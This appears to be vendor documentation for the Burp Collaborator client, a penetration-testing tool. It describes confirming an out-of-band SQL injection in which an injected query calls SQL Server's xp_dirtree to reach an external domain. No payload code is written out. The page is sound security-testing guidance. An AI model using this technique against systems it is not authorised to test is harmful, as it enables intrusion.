1. Support Center
  2. Documentation
  3. Desktop editions
  4. Tools
  5. Collaborator client

Burp Collaborator client

Burp Collaborator client is a tool for making use of Burp Collaborator during manual testing. You can use the Collaborator client to generate payloads for use in manual testing, and poll the Collaborator server for any network interactions that result from using those payloads.

To run Burp Collaborator client, go to the Burp menu and select "Burp Collaborator client".

The following functions are available:

Please take note of the following when using the Burp Collaborator client:

Using Burp Collaborator client

In some situations, it isn't possible to trigger any noticeable effect in the application's response, either in its contents or in the time taken to receive it. In this situation, it is possible to detect vulnerabilities by causing the database to make an out-of-band network connection to the tester's server. Burp Scanner uses this technique via the Burp Collaborator feature.

The following steps demonstrate the process of using the Collaborator client to manually verify a vulnerability based on a Collaborator interaction.

In our example, Burp Scanner has sent a payload that injects a SQL query that calls the SQL Server's xp_dirtree stored procedure with a UNC file path that references a URL on an external domain.

The application interacted with that domain, indicating that the injected SQL query was executed.

We can use the Collaborator client to verify this finding.

Collaborator client interaction

In our example, we've identified the Collaborator payload in the request and sent the request to the Repeater.

We'll need to replace the payload with a payload generated by the Collaborator client.

There is no cross-talk of payloads or interactions between separate client windows or Burp Collaborator. Hence, if you close a client window, or use a payload generated by the Scanner, there is no way to retrieve any further interactions resulting from its payloads.

Identifying the payload in the request

To run Burp Collaborator client, go to the Burp menu and select "Burp Collaborator client".

Opening Burp Collaborator client

Use the "Copy to clipboard" function to copy your payload.

Note: You can generate a specified number of Collaborator payloads and copy these to the clipboard. You can use these in manual testing, for example using Burp Intruder or Repeater.

Copy Burp Collaborator payload to clipboard

Paste the Collaborator client payload in to the appropriate place and forward the request.

Paste the payload into the request

Use the "Poll now" function to retrieve details of any network interactions resulting from your payload.

In this example the Collaborator server received a DNS lookup, confirming that the injected SQL query was executed

Polling for interactions